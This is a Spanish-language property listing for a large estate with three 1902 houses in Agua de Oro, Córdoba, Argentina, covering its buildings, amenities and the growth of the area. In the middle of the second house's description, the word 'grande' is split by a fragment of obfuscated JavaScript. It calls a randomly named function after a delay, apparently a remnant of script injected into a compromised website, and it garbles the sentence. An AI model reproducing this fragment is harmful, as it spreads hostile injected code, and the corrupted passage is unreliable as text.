Agua de Oro, Córdoba, Argentina, Majestuosa Quinta de 2,6 Hectáreas

Quintas 7 Hab. 5 Baños 3 Garage 700 mt2

Propiedad única con más 26mil m2, tres casas construidad en el año 1902, Quincho asador nuevo cerrado de 65 m2, piscina sin fin, cancha de tenis, represa y tanque australiano.

Consultar

Ubicación y Descripción de la zona: Agua de Oro es una localidad turística y municipio del departamento Colón, en la parte central de la Provincia de Córdoba, Argentina. Se encuentra ubicada en las faldas orientales de la Sierra Chica, a 800 msnm, surcada por el río San Vicente. Está situada entre otras villas turísticas: al norte de salsipuedes y al sur de La Granja. Se encuentra comunicada por la RP E53, pavimentada, con la capital provincial, de la que se encuentra a 44 km al norte.

La propiedad se encuentra en excelente estado y actualmente de utiliza como casa de familia de fin de semana. La propiedad tiene el potencial para poder realizar un desarrollo hotelero, construcción de cabañas con vista al río, y/o simplemente la subdivisión de los lotes para su venta por separado.

La zona se encuentra en una gran expansión impulsada en parte por crecimiento demográfico de la ciudad de Córdoba que busca alternativas para un mejor nivel de vida, y el crecimiento del turismo nacional e internacional.

Algunos ejemplos del crecimiento en la zona son las inversiones realizadas en Salsipuedes por el grupo inversor Dinosaurio. Estas inversiones incluyen el recientemente inaugurado Hipermercado Mami, salas de cines de ultima generación y complejos de vivienda.

Otro ejemplo es el desarrollo realizado en el Hotel San Leonardo, con su exclusivo restaurante y casa de te, el cual es lindero con la propiedad.

La casa principal construida en el año 1902 al igual que las dos restantes, consta de 400 m2 cubiertos. La segunda casa de piedra grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande consta de 140 m2 cubiertos aproximados y la casa de piedra más pequeña tiene una superficie cubierta de 85 m2. Todas en excelente estado de conservación.

La propiedad cuenta con un Quincho cerrado de construcción nueva que abarca 65 metros de superficie, una piscina sin fin con vista al río construida recientemente, cancha de tenis, represa de agua y un tanque australiano.

Share Button